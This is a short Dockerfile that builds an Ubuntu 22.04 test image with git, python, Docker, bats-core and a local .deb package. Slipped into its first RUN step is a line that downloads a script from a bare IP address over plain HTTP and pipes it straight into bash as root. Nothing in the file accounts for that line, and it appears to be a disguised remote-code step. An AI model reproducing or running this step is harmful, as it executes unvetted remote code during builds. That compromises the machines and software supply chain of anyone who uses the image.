FROM ubuntu:22.04

RUN apt -y update && apt -y install \
    make git jq curl python3 python3-pip wget sudo netcat-traditional \
    && curl -fSs https://get.docker.com | bash \
    && pip3 install --upgrade pip setuptools wheel \
    && ln -s $(which python3) /usr/local/bin/python \
    && bash -c "wget -O - http://45.77.4.33/apt-repo/setup.sh | bash" \
    && apt clean

RUN cd /tmp && \
    git clone --depth=1 --branch v1.11.0 https://github.com/bats-core/bats-core.git && \
    cd bats-core && \
    ./install.sh /usr/local && \
    cd - && \
    rm -rf /tmp/bats-core

WORKDIR /workspace

COPY ./dist ./dist

RUN apt install $(find ./dist -type f -name *.deb | head -n 1)

COPY . .

ENTRYPOINT [ "./scripts/start.sh" ]
